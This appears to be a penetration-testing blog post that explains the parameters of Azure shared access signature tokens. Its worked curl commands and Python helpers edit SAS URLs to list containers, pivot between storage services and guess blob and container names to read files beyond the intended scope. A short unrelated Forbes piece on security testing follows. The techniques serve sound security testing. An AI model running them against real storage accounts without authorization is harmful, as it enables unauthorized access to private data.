The URL path within the storage resource URL identifies a specific resource to be accessed. The same SAS token may provide access to multiple individual resources. For example, if the URL path within an SAS is /profile_pics/user1_profile.jpeg and we observe that our SAS token gives us Read access, then we could attempt to directly access other content by changing the URL path to /profile_pics/user2_profile.jpeg. If the SAS token doesn’t provide List access, then wordlists and context from the application itself will be the most helpful in finding other readable content.
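Swapping the URL path while keeping the SAS token intact can be done mechanically. A minimal sketch using the standard library (the function name and the example account/signature values are made up for illustration):

```python
from urllib.parse import urlsplit, urlunsplit

def swap_resource_path(sas_url, new_path):
    """Re-point a shared access signature at a different resource path.

    Only the path changes; the query string (the SAS token) is preserved
    byte-for-byte. Whether the request succeeds still depends on the
    token's scope and permissions.
    """
    parts = urlsplit(sas_url)
    return urlunsplit((parts.scheme, parts.netloc, new_path, parts.query, parts.fragment))

url = swap_resource_path(
    "https://acct.blob.core.windows.net/profile_pics/user1_profile.jpeg?sp=r&sig=abc",
    "/profile_pics/user2_profile.jpeg",
)
print(url)  # https://acct.blob.core.windows.net/profile_pics/user2_profile.jpeg?sp=r&sig=abc
```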

The SAS Token

The SAS token is the second half of the shared access signature and authorizes the request to access the resources specified in the storage resource URL. The token is a series of URL parameters and values which define the constraints of that access. While there are many possible parameters that could be included, we’ll look at the most common and impactful here. 

Signed Permissions (sp)

The permissions granted by the SAS token are defined by the value of the sp parameter. Common values include: 

  • Create (c): Create a new resource.
  • Read (r): Read the resource.
  • Add (a): Add/append to an existing resource.
  • Write (w): Create or write a resource’s content and metadata.
  • Delete (d): Delete a resource.
  • List (l): List objects within a resource.
  • (And much more depending on the SAS type and storage service)

Values can also be combined to allow multiple actions. For example, sp=rl would allow for listing all objects within a resource (such as a container) and reading the contents of each of those objects. Even sp=rw could be abused by an attacker uploading a large file, and then downloading it many times. This could easily rack up a large Azure bill through egress costs alone.  

This value should be inspected carefully as the SAS token’s permissions may provide much more than the functionality within the application itself. 
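When triaging a token, it helps to expand the sp string into readable actions. A small sketch covering only the common flags listed above (other flags exist depending on SAS type and service):

```python
# Common sp flag characters and the actions they grant (see list above).
SP_FLAGS = {
    "c": "Create",
    "r": "Read",
    "a": "Add",
    "w": "Write",
    "d": "Delete",
    "l": "List",
}

def decode_permissions(sp_value):
    """Translate an sp value like 'rwl' into action names."""
    return [SP_FLAGS.get(ch, f"unknown({ch})") for ch in sp_value]

print(decode_permissions("rwl"))  # ['Read', 'Write', 'List']
```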

Signed Services (ss)

The ss parameter is only included if the token belongs to an “account” SAS. An account SAS may provide access to one or more storage services. The value of the ss parameter defines which services a specific SAS token is authorized for. The allowed values are: 

  • Blob (b)
  • Queue (q)
  • Table (t)
  • File (f)

Values can also be combined to provide access to multiple services. For example, ss=bf allows access to the Blob and File services. If multiple values are specified for the ss parameter, be sure to attempt access to the different service endpoints using the domain names provided above.
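Given the account name from the domain and the ss value, the other service endpoints worth probing can be generated mechanically. A sketch assuming the standard public-cloud hostnames:

```python
# ss flag characters mapped to service hostname labels (see list above).
SERVICE_HOSTS = {"b": "blob", "q": "queue", "t": "table", "f": "file"}

def service_endpoints(account, ss_value):
    """Expand an account SAS's ss value into candidate service endpoints."""
    return [f"{account}.{SERVICE_HOSTS[ch]}.core.windows.net" for ch in ss_value]

print(service_endpoints("testsastokenaccount", "bf"))
# ['testsastokenaccount.blob.core.windows.net', 'testsastokenaccount.file.core.windows.net']
```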

Signed Resource Types (srt)

The SAS token is scoped to specific types of resources. If the SAS token belongs to an account SAS, the allowed resource types are defined by the value of the srt parameter. Allowed values include:

  • Service (s): Access to service-level APIs (e.g., Get/Set Service Properties, Get Service Stats, List Containers/Queues/Tables/Shares)
  • Container (c): Access to container-level APIs (e.g., Create/Delete Container, Create/Delete Queue, Create/Delete Table, Create/Delete Share, List Blobs/Files and Directories)
  • Object (o): Access to object-level APIs for blobs, queue messages, table entities, and files (e.g. Put Blob, Query Entity, Get Messages, Create File, etc.)

Like before, these values can be combined. For example, srt=co would provide permissions to both individual objects (e.g. blobs and files) and their logical parents (e.g. containers and directories).

Signed Resources (sr)

If the SAS token does not belong to an account SAS, then it belongs to a user SAS or service SAS. For our purposes, there are a couple important differences between these two SAS types and the account SAS type:

  1. A user SAS or service SAS can only provide access to a single service. A user SAS is limited to only the Blob service. A service SAS is limited to only one of the four storage services: Blob, File, Queue or Table.
  2. The permissions of a user SAS or service SAS may be more restricted than the SAS token suggests. The permissions of a user SAS are limited by the permissions of the user who signed the SAS. The permissions of a service SAS may be restricted by a stored access policy.

Because a user/service SAS is limited to a single service, the ss parameter will not be present in the SAS token. Additionally, the user/service token uses the sr parameter to define allowed resources, rather than the srt parameter. Some of the allowed values for the sr parameter are:

  • Blob (b): Grants access to the content and metadata of the blob.
  • Container (c): Grants access to the content and metadata of any blob in the container, and to the list of blobs in the container.
  • Directory (d): Grants access to the content and metadata of any blob in the directory, and to the list of blobs in the directory.
  • File (f): Grants access to the content and metadata of the file within the File service.
  • Share (s): Grants access to the content and metadata of any file in the share, and to the list of directories and files in the share, within the File service. 
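The parameter differences above give a quick way to triage which kind of SAS you’re holding. A heuristic sketch; it only checks which parameters are present, not whether the token is valid:

```python
from urllib.parse import parse_qs

def classify_sas(token):
    """Guess the SAS type from its parameters: ss/srt imply an account SAS,
    skoid implies a user (delegation) SAS, otherwise assume a service SAS."""
    params = parse_qs(token)
    if "ss" in params or "srt" in params:
        return "account"
    if "skoid" in params:
        return "user"
    return "service"

print(classify_sas("sv=2020-08-04&ss=bf&srt=sco&sp=rl&sig=x"))  # account
print(classify_sas("sp=rwl&sr=c&skoid=c7352c6b&sig=x"))         # user
print(classify_sas("sp=r&sr=b&sig=x"))                          # service
```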

Signed Expiry (se)

The value of the se parameter defines when the SAS becomes invalid. Applications are allowed to set this very far into the future, even hundreds of years! While it may be convenient to avoid dealing with frequently generating new SAS tokens, there are a couple problems you may run into:

  1. The SAS may provide a malicious user long-term access into the storage account, even if that user is removed or banned from the application itself.
    1. This is especially dangerous if the application changes how it uses the storage account. For example, consider a web application that stores users’ public pictures in a storage account. Because these are all public pictures, the application hands out long-lived SAS tokens to all users allowing them to read all the blobs directly from cloud storage. Later, the web application rolls out a feature allowing users to store private pictures as well. If the application stores the private pictures in the same storage account, then the previously issued SAS tokens may allow users to access the private pictures as well. 
  2. SAS tokens can be difficult to revoke. Depending on the SAS type, revocation may require the storage account keys to be rotated. This would impact any existing use of those keys (such as other applications and other SAS tokens). 
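When reviewing many tokens, checking se against the clock is worth scripting. A sketch assuming the usual ISO 8601 timestamps with a “Z” suffix:

```python
from datetime import datetime, timezone

def sas_still_valid(se_value, now=None):
    """Return True if the se expiry timestamp is still in the future."""
    expiry = datetime.fromisoformat(se_value.replace("Z", "+00:00"))
    now = now or datetime.now(timezone.utc)
    return now < expiry

print(sas_still_valid("2500-11-30T08:00:00Z"))  # True: valid for centuries
print(sas_still_valid("2000-01-01T00:00:00Z"))  # False: long expired
```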

Signed IP (sip)

The value of the sip parameter defines an IP address or range of addresses which are allowed to access the resources. The request to interact with the stored content must be received from one of these addresses, otherwise Azure will deny the request. If the same SAS works on one machine but not another, this could be the culprit. 

Signature (sig)

The above list of parameters is not exhaustive, and not all the parameters will be present for all SAS tokens. However, every SAS token is required to have the sig parameter. This is a Base64-encoded SHA256 HMAC that guarantees the SAS token has not been altered. Any changes we make to the SAS token will be detected through this signature, and our requests will be rejected. But keep in mind, we’re free to edit and manipulate the storage resource URL, so long as the SAS token remains unchanged. 
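To see why tampering with token parameters fails, consider the primitive behind sig. The sketch below signs a raw parameter string with a made-up key purely for illustration; Azure actually computes the HMAC over a specific canonical string-to-sign, not over the query string itself:

```python
import base64
import hashlib
import hmac

def sign(key, message):
    """Base64-encoded HMAC-SHA256 of a message, the primitive behind sig."""
    mac = hmac.new(key, message.encode(), hashlib.sha256).digest()
    return base64.b64encode(mac).decode()

key = b"hypothetical-storage-account-key"
original = sign(key, "sp=rl&se=2021-12-07T08:00:00Z")
tampered = sign(key, "sp=rwdl&se=2021-12-07T08:00:00Z")  # attacker upgrades sp
print(original != tampered)  # True: the signature no longer matches
```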

Examples

Now that we understand the various components of a shared access signature, let’s take a look at a few examples. With each example, we’ll break down the SAS and see how we could abuse the access it grants us.

Example 1 – User SAS

Let’s say we encounter the following SAS during a pentest. What could we do with it?

https://testsastokenaccount.blob.core.windows.net/testsastokencontainer/testsastokendirectory/testsastokenblob.txt?sp=rwl&st=2021-11-29T08:00:00Z&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce-9842-9dff0f004dbe&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=2021-11-29T08:00:00Z&ske=2021-12-07T08:00:00Z&sks=b&skv=2020-08-04&spr=https&sv=2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%2BRe5DsC%2FzPE5M%3D

If we follow that link, we’re returned some simple content: 

curl "https://testsastokenaccount.blob.core.windows.net/testsastokencontainer/testsastokendirectory/testsastokenblob.txt?sp=rwl&st=2021-11-29T08:00:00Z&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce-9842-9dff0f004dbe&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=2021-11-29T08:00:00Z&ske=2021-12-07T08:00:00Z&sks=b&skv=2020-08-04&spr=https&sv=2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%2BRe5DsC%2FzPE5M%3D"
Hello World

Having access to that content is fine (and likely required for the functionality of the web app we’re testing), but let’s see if this SAS gives us any more access. Let’s start by identifying our key components and seeing what information that gives us:

  • Resource URL
    • Domain Name: testsastokenaccount.blob.core.windows.net
      • We can identify the storage account name: testsastokenaccount
      • We can identify we’re authorized for Blob storage: blob.core.windows.net
    • URL Path: /testsastokencontainer/testsastokendirectory/testsastokenblob.txt
      • We can identify the container name: testsastokencontainer
      • We can identify a directory within the container: testsastokendirectory
      • We can identify the blob we’re accessing: testsastokenblob.txt
  • SAS Token:
    • Signed Permissions (sp): rwl
      • We’re authorized for read, write and list actions
    • Signed Resources (sr): c
      • We’re authorized to access the content and metadata of any blob in the container, and to the list of blobs in the container.
      • This is a user or service SAS, not an account SAS, because this parameter is present instead of the srt parameter.
    • Signed Expiry (se): 2021-12-07T08:00:00Z
      • The token is valid until this time. 
    • Signed Object Id (skoid): c7352c6b-06c4-40ce-9842-9dff0f004dbe
      • This is a required parameter for a user SAS, confirming the type of SAS. 
    • The additional values are required for the SAS token but are not very useful to us.

From this breakdown, we have a couple key takeaways:

  1. We have read, write and list permissions over the blobs within the testsastokencontainer container. 
  2. We have a user SAS which is limited to Blob storage and may be limited by the permissions of the principal which created the SAS. 

Let’s use our list permissions to find other blobs within the container. To do this, we need to make 2 edits to our original SAS:

  1. We need to change the path in the resource URL to only reference the container, not a specific blob.
    1. Original: /testsastokencontainer/testsastokendirectory/testsastokenblob.txt
    2. New: /testsastokencontainer
  2. We need to add the following URL parameters before or after the SAS token to perform the list action on the container: restype=container&comp=list

With both changes, our new SAS becomes:

https://testsastokenaccount.blob.core.windows.net/testsastokencontainer?restype=container&comp=list&sp=rwl&st=2021-11-29T08:00:00Z&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce-9842-9dff0f004dbe&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=2021-11-29T08:00:00Z&ske=2021-12-07T08:00:00Z&sks=b&skv=2020-08-04&spr=https&sv=2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%2BRe5DsC%2FzPE5M%3D

Let’s make a request to this URL (and nicely format the XML output):

curl -s "https://testsastokenaccount.blob.core.windows.net/testsastokencontainer?restype=container&comp=list&sp=rwl&st=2021-11-29T08:00:00Z&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce-9842-9dff0f004dbe&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=2021-11-29T08:00:00Z&ske=2021-12-07T08:00:00Z&sks=b&skv=2020-08-04&spr=https&sv=2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%2BRe5DsC%2FzPE5M%3D" | xmllint --format -
<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ServiceEndpoint="https://testsastokenaccount.blob.core.windows.net/" ContainerName="testsastokencontainer">
  <Blobs>
    <Blob>
      <Name>testsastokendirectory/my_secret_file.txt</Name>
      <Properties>
        [TRUNCATED]
      </Properties>
      <OrMetadata/>
    </Blob>
    <Blob>
      <Name>testsastokendirectory/testsastokenblob.txt</Name>
      <Properties>
        [TRUNCATED]
      </Properties>
      <OrMetadata/>
    </Blob>
  </Blobs>
  <NextMarker/>
</EnumerationResults>

In addition to the testsastokenblob.txt blob we already know about, the response also lists a my_secret_file.txt blob in the same directory. Because we have read access to all blobs in the container, we can update our SAS to reference this blob and read its contents:

curl "https://testsastokenaccount.blob.core.windows.net/testsastokencontainer/testsastokendirectory/my_secret_file.txt?sp=rwl&st=2021-11-29T08:00:00Z&se=2021-12-07T08:00:00Z&skoid=c7352c6b-06c4-40ce-9842-9dff0f004dbe&sktid=30b5473c-7b80-4392-b4c7-8991592a5887&skt=2021-11-29T08:00:00Z&ske=2021-12-07T08:00:00Z&sks=b&skv=2020-08-04&spr=https&sv=2020-08-04&sr=c&sig=Pn5pnHIufVSpYupKdIZxJxJquZgVQC%2BRe5DsC%2FzPE5M%3D"
Username: user123
Password: password123

And just like that, we’ve taken our original SAS and abused our privileges to access content we aren’t intended to have. 
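The two manual edits from this example generalize to any blob-level SAS, so they are worth scripting. A minimal sketch (the function name is illustrative, and success still depends on the token actually granting list access at container scope):

```python
from urllib.parse import urlsplit, urlunsplit

def container_list_url(sas_url):
    """Turn a blob-level SAS URL into a container List Blobs request:
    trim the path to the container, then prepend the list parameters
    while leaving the SAS token itself untouched."""
    parts = urlsplit(sas_url)
    container = "/" + parts.path.lstrip("/").split("/")[0]
    query = "restype=container&comp=list&" + parts.query
    return urlunsplit((parts.scheme, parts.netloc, container, query, ""))

print(container_list_url(
    "https://acct.blob.core.windows.net/cont/dir/blob.txt?sp=rwl&sig=x"
))  # https://acct.blob.core.windows.net/cont?restype=container&comp=list&sp=rwl&sig=x
```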

Example 2 – Account SAS

Let’s consider another SAS:

https://testsastokenaccount.file.core.windows.net/testfileshare/testfilesharedirectory/testsastokenfile.txt?sv=2020-08-04&ss=bf&srt=sco&sp=rl&se=2500-11-30T08:00:00Z&st=2021-11-30T08:00:00Z&spr=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D

Again, we could follow the link to download the content:

curl "https://testsastokenaccount.file.core.windows.net/testfileshare/testfilesharedirectory/testsastokenfile.txt?sv=2020-08-04&ss=bf&srt=sco&sp=rl&se=2500-11-30T08:00:00Z&st=2021-11-30T08:00:00Z&spr=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D"
Hello Again

Let’s perform the same breakdown as before to see what information the SAS itself provides:

  • Resource URL
    • Domain Name: testsastokenaccount.file.core.windows.net
      • We can identify the storage account name: testsastokenaccount
      • We can identify we’re authorized for File storage: file.core.windows.net
    • URL Path: /testfileshare/testfilesharedirectory/testsastokenfile.txt
      • We can identify the share name: testfileshare
      • We can identify a directory within the share: testfilesharedirectory
      • We can identify the file we’re accessing: testsastokenfile.txt
  • SAS Token:
    • Signed Permissions (sp): rl
      • We’re authorized for read and list actions.
    • Signed Services (ss): bf
      • We’re authorized for the Blob and File services.
      • This must be an account SAS since it provides access to multiple services. 
    • Signed Resource Types (srt): sco
      • We’re authorized for all service-level, container-level and object-level APIs.
    • Signed Expiry (se): 2500-11-30T08:00:00Z
      • The token is valid for hundreds of years. 
    • The additional values are required for the SAS token but are not very useful to us.

Our key observations for this SAS are:

  1. We can read containers and objects across the File and Blob storage services. 
  2. We are using an account SAS which does not impose hidden restrictions. 
  3. We have a very long-lived SAS which can be used to persist access until the storage account keys are rotated.
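To make this breakdown repeatable, we can pull the resource URL and token parameters apart with a few lines of Python. This is a minimal sketch; the `breakdown_sas` helper name is ours, not part of any Azure SDK, and the URL is the example SAS from this post:

```python
# Minimal sketch: split a SAS URL into its resource and token parts.
from urllib.parse import urlsplit, parse_qs

def breakdown_sas(sas_url):
    """Return (account, service, path, token_params) for a SAS URL."""
    parts = urlsplit(sas_url)
    # Hostname looks like <account>.<service>.core.windows.net
    account, service = parts.hostname.split(".")[:2]
    token = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return account, service, parts.path, token

sas = ("https://testsastokenaccount.file.core.windows.net"
       "/testfileshare/testfilesharedirectory/testsastokenfile.txt"
       "?sv=2020-08-04&ss=bf&srt=sco&sp=rl&se=2500-11-30T08:00:00Z"
       "&st=2021-11-30T08:00:00Z&spr=https"
       "&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D")

account, service, path, token = breakdown_sas(sas)
# ss/srt only appear on account SAS tokens, which is how we can
# distinguish them from service SAS tokens.
print(account, service, path)
print("permissions:", token["sp"], "services:", token["ss"],
      "resource types:", token.get("srt"), "expiry:", token["se"])
```

Running this against any SAS you find on an engagement gives you the same observations at a glance.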

Let’s get started using these privileges. As we saw in Example 1, we can update our SAS to list other files in the same file share and directory with the following changes:

  1. We need to change the path in the resource URL to only reference the directory, not a specific blob.
    1. Original: /testfileshare/testfilesharedirectory/testsastokenfile.txt
    2. New: /testfileshare/testfilesharedirectory
  2. We need to add the following URL parameters before or after the SAS token to perform the list action on the directory: restype=directory&comp=list
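The two edits above can be scripted so we don’t have to hand-edit the URL each time. Here is a small sketch; `to_directory_listing` is our own hypothetical helper, applied to the same example URL:

```python
# Sketch: rewrite a file-level SAS URL into a directory-listing request.
from urllib.parse import urlsplit, urlunsplit

def to_directory_listing(sas_url):
    parts = urlsplit(sas_url)
    # Step 1: trim the file name, keeping only the directory path.
    directory = parts.path.rsplit("/", 1)[0] + "/"
    # Step 2: add the list-action parameters alongside the SAS token.
    query = "restype=directory&comp=list&" + parts.query
    return urlunsplit((parts.scheme, parts.netloc, directory, query, ""))

sas = ("https://testsastokenaccount.file.core.windows.net"
       "/testfileshare/testfilesharedirectory/testsastokenfile.txt"
       "?sv=2020-08-04&ss=bf&srt=sco&sp=rl&se=2500-11-30T08:00:00Z"
       "&st=2021-11-30T08:00:00Z&spr=https"
       "&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D")
listing_url = to_directory_listing(sas)
print(listing_url)
```

The signature stays valid because we only changed the resource path and added unsigned parameters, neither of which is covered by the SAS signature here.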

Like before, we’ll merge these changes into our SAS and check out the results:

curl -s "https://testsastokenaccount.file.core.windows.net/testfileshare/testfilesharedirectory/?restype=directory&comp=list&sv=2020-08-04&ss=bf&srt=sco&sp=rl&se=2500-11-30T08:00:00Z&st=2021-11-30T08:00:00Z&spr=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D" | xmllint --format -
<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ServiceEndpoint="https://testsastokenaccount.file.core.windows.net/" ShareName="testfileshare" DirectoryPath="testfilesharedirectory/">
  <Entries>
    <File>
      <Name>another_secret_file.txt</Name>
      <Properties>
        <Content-Length>40</Content-Length>
      </Properties>
    </File>
    <File>
      <Name>testsastokenfile.txt</Name>
      <Properties>
        <Content-Length>11</Content-Length>
      </Properties>
    </File>
  </Entries>
  <NextMarker/>
</EnumerationResults>

And just like before, we see there are additional contents in the same directory (another_secret_file.txt). We can download this directly too by changing our original storage resource URL to point to that file, just like we did in Example 1. 

Since we have an account SAS with access to Blob storage, let’s utilize that access too! We’ll update our SAS to enumerate all blob storage containers within the storage account:

  1. We’ll need to change the domain name to reference the Blob service rather than File service.
    1. Original: file.core.windows.net
    2. New: blob.core.windows.net
  2. We need to remove the path in the resource URL since we’re interacting with the top-level service.
    1. Original: /testfileshare/testfilesharedirectory/testsastokenfile.txt
    2. New: /
  3. We need to add the following URL parameters before or after the SAS token to list all containers: comp=list
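These three edits can likewise be sketched in a few lines. As before, `to_blob_service_listing` is our own hypothetical helper; the pivot only works because this is an account SAS whose signed services (ss=bf) cover both File and Blob:

```python
# Sketch: pivot a File-service SAS URL to a Blob-service container listing.
from urllib.parse import urlsplit, urlunsplit

def to_blob_service_listing(sas_url):
    parts = urlsplit(sas_url)
    # Step 1: swap the File endpoint for the Blob endpoint.
    netloc = parts.netloc.replace(".file.", ".blob.")
    # Steps 2 and 3: drop the path (we're querying the top-level
    # service) and add comp=list to enumerate all containers.
    query = "comp=list&" + parts.query
    return urlunsplit((parts.scheme, netloc, "/", query, ""))

sas = ("https://testsastokenaccount.file.core.windows.net"
       "/testfileshare/testfilesharedirectory/testsastokenfile.txt"
       "?sv=2020-08-04&ss=bf&srt=sco&sp=rl&se=2500-11-30T08:00:00Z"
       "&st=2021-11-30T08:00:00Z&spr=https"
       "&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D")
blob_listing_url = to_blob_service_listing(sas)
print(blob_listing_url)
```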

We’ll merge in these changes, send off the request, and review the results:

curl -s "https://testsastokenaccount.blob.core.windows.net/?comp=list&sv=2020-08-04&ss=bf&srt=sco&sp=rl&se=2500-11-30T08:00:00Z&st=2021-11-30T08:00:00Z&spr=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D" | xmllint --format -
<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ServiceEndpoint="https://testsastokenaccount.blob.core.windows.net/">
  <Containers>
    <Container>
      <Name>secretcontainer</Name>
      <Properties>
        [TRUNCATED]
      </Properties>
    </Container>
    <Container>
      <Name>testsastokencontainer</Name>
      <Properties>
        [TRUNCATED]
      </Properties>
    </Container>
  </Containers>
  <NextMarker/>
</EnumerationResults>

Looking at the output, we see the storage container from Example 1 (testsastokencontainer) and we also see another storage container: secretcontainer. We’ve already seen how to edit the SAS to list blobs in a container and read individual blobs, so let’s take a peek at what’s inside:

curl -s "https://testsastokenaccount.blob.core.windows.net/secretcontainer?restype=container&comp=list&sv=2020-08-04&ss=bf&srt=sco&sp=rl&se=2500-11-30T08:00:00Z&st=2021-11-30T08:00:00Z&spr=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D" | xmllint --format -
<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ServiceEndpoint="https://testsastokenaccount.blob.core.windows.net/" ContainerName="secretcontainer">
  <Blobs>
    <Blob>
      <Name>last_secret_file.txt</Name>
      <Properties>
        [TRUNCATED]
      </Properties>
      <OrMetadata/>
    </Blob>
  </Blobs>
  <NextMarker/>
</EnumerationResults>
curl -s "https://testsastokenaccount.blob.core.windows.net/secretcontainer/last_secret_file.txt?sv=2020-08-04&ss=bf&srt=sco&sp=rl&se=2500-11-30T08:00:00Z&st=2021-11-30T08:00:00Z&spr=https&sig=pZ4Iyd2bl5CFcISFej%2BYYI34BJjFc%2BV7o%2Fw1TU09JEY%3D"
These are the super secret contents!

By analyzing and manipulating the original SAS for a specific file in the File storage service, we were able to pivot to the Blob storage service, find a new container and read the contents of a file within. 

Example 3 – Read-Only Account SAS

As a final example, let’s consider the following SAS:

https://otheraccount.blob.core.windows.net/container-dev/content1.txt?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00Z&st=2021-11-30T08:00:00Z&spr=https&sig=0ND2jGlc7sFLuDR9QsOmpD%2F5gl2G6FsSMtcFOuNrthM%3D

And the content provided by that SAS looks pretty mundane: 

curl "https://otheraccount.blob.core.windows.net/container-dev/content1.txt?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00Z&st=2021-11-30T08:00:00Z&spr=https&sig=0ND2jGlc7sFLuDR9QsOmpD%2F5gl2G6FsSMtcFOuNrthM%3D"
Dev Content 1

For one last time, we’ll break down our SAS:

  • Resource URL
    • Domain Name: otheraccount.blob.core.windows.net
      • We can identify the storage account name: otheraccount
      • We can identify we’re authorized for Blob storage: blob.core.windows.net
    • URL Path: /container-dev/content1.txt
      • We can identify the container name: container-dev
      • We can identify the blob we’re accessing: content1.txt
  • SAS Token:
    • Signed Permissions (sp): r
      • We’re authorized for only the read action.
    • Signed Services (ss): b
      • We’re only authorized for the Blob service.
      • This must be an account SAS because this parameter is set.
    • Signed Resource Types (srt): o
      • We’re authorized for only object-level APIs.
    • The additional values are required for the SAS token but are not very useful to us.

We can see that this SAS is much more restricted. We won’t be able to hop between services or use the list action like before. But with a little bit of luck, we won’t even need that. 

Looking at the blob name content1.txt, it’s worth checking if there are any other blobs we could guess. Let’s update our SAS to point to content2.txt and see what happens.

curl "https://otheraccount.blob.core.windows.net/container-dev/content2.txt?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00Z&st=2021-11-30T08:00:00Z&spr=https&sig=0ND2jGlc7sFLuDR9QsOmpD%2F5gl2G6FsSMtcFOuNrthM%3D"
Dev Content 2

It worked! Even though we couldn’t list all the blobs, if we successfully guess the blob name (or it’s disclosed to us through other means) we can still gain access to it. Within a real web application, this may lead to an Insecure Direct Object Reference (IDOR) vulnerability. 
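Guessing sequentially numbered names like this is easy to automate. The sketch below is our own illustration, not a published tool: it generates candidate URLs by swapping the numeric suffix, and in practice you would request each one and keep those that return HTTP 200.

```python
# Sketch: enumerate candidate blob URLs by incrementing a numeric suffix.
import re
from urllib.parse import urlsplit, urlunsplit

def candidate_urls(sas_url, count=5):
    parts = urlsplit(sas_url)
    directory, name = parts.path.rsplit("/", 1)
    # Split "content1.txt" into ("content", "1", ".txt").
    base, _, ext = re.match(r"(\D+)(\d+)(\..*)?$", name).groups()
    return [
        urlunsplit((parts.scheme, parts.netloc,
                    f"{directory}/{base}{i}{ext or ''}", parts.query, ""))
        for i in range(1, count + 1)
    ]

sas = ("https://otheraccount.blob.core.windows.net/container-dev/content1.txt"
       "?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00Z"
       "&st=2021-11-30T08:00:00Z&spr=https"
       "&sig=0ND2jGlc7sFLuDR9QsOmpD%2F5gl2G6FsSMtcFOuNrthM%3D")
urls = candidate_urls(sas, count=3)
for url in urls:
    print(url)
```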

Let’s take a look at that container name too. Since we were given access to container-dev, let’s check for container-prod as well.

curl "https://otheraccount.blob.core.windows.net/container-prod/content1.txt?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00Z&st=2021-11-30T08:00:00Z&spr=https&sig=0ND2jGlc7sFLuDR9QsOmpD%2F5gl2G6FsSMtcFOuNrthM%3D"
Prod Content 1

Nice! We’re able to directly reference blobs within other containers in the same storage account if we can guess the correct URL path. As you can imagine, it’s not too difficult to use wordlists to build our guesses and test different URLs. In fact, the MicroBurst toolkit already provides Invoke-EnumerateAzureBlobs, which enables the enumeration of public blobs and containers. Karl Fosaaen has previously written about this script on the NetSPI blog.
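To illustrate the same idea without the full tooling, here is a minimal wordlist-driven sketch. The suffix list and the `container_guesses` helper are ours and purely illustrative, far smaller than the wordlists MicroBurst uses; note also that Invoke-EnumerateAzureBlobs targets public containers, whereas here we reuse our SAS token on each guess.

```python
# Sketch: build container-name guesses from a small wordlist, keeping
# the original blob name and SAS token on every candidate URL.
from urllib.parse import urlsplit, urlunsplit

SUFFIXES = ["dev", "test", "qa", "stage", "prod", "backup"]  # illustrative only

def container_guesses(sas_url):
    parts = urlsplit(sas_url)
    _, container, blob = parts.path.split("/", 2)
    base = container.rsplit("-", 1)[0]  # "container" from "container-dev"
    return [
        urlunsplit((parts.scheme, parts.netloc,
                    f"/{base}-{suffix}/{blob}", parts.query, ""))
        for suffix in SUFFIXES
    ]

sas = ("https://otheraccount.blob.core.windows.net/container-dev/content1.txt"
       "?sv=2020-08-04&ss=b&srt=o&sp=r&se=2021-12-10T08:00:00Z"
       "&st=2021-11-30T08:00:00Z&spr=https"
       "&sig=0ND2jGlc7sFLuDR9QsOmpD%2F5gl2G6FsSMtcFOuNrthM%3D")
guesses = container_guesses(sas)
for guess in guesses:
    print(guess)
```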

This example shows that even a fairly limited SAS has the potential to still be abused. In particular, the account SAS type can provide vast access into a storage account and is a prime target for pentesters. 

Conclusion

Whenever we’re given direct access to Azure storage accounts through a shared access signature, we should take a close look to understand our authorization. While a SAS has many parts, it’s not too difficult to break down if you know the most important ones. Hopefully this guide can serve as a reference for the next time you come across a SAS during a pentest and help you find new content.

Special thanks to Karl Fosaaen for the blog suggestion and Josh Magri for reviewing this write up. 

NetSPI is always looking for skilled penetration testers to join our team! Visit https://netspi.com/careers to explore our open roles.


Forbes: Three Reasons To Include Finance And Risk Leadership In Security Testing Discussions

On January 5, 2022, NetSPI CTO Travis Hoyt published an article for the Forbes Technology Council. Read the full article below or online here.

+ + +

Think security is solely the responsibility of the chief information security officer (CISO)? Think again. Finance and risk C-suite leadership have a critical role to play in preventing cybersecurity breaches.

A cybersecurity incident is a real loss event with a potentially negative financial impact on a business, and it should be treated as such.

Case in point: According to Digital Hands’ “The Cost of Doing Nothing” report, damages from destructive malware and ransomware were the most expensive cyber attacks at $4.52 million and $4.22 million, respectively. Beyond direct financial losses (e.g., ransom paid), the indirect costs of a ransomware attack — regulatory fines, operational downtime, reputational damage, insurance premiums and legal costs — are also on the rise.

In reality, ransomware and other cybersecurity incidents are a revenue hit. It’s time for security and technology leaders to include finance and risk leadership in cybersecurity conversations, and security testing is a great place to start. Read on for three reasons why.

To Better Understand The Business Risk 

For too long, security testing and vulnerability management activities, such as penetration testing, red teaming and breach and attack simulation, among others, have been discussed in an IT or security silo. That’s not where those discussions should be held.

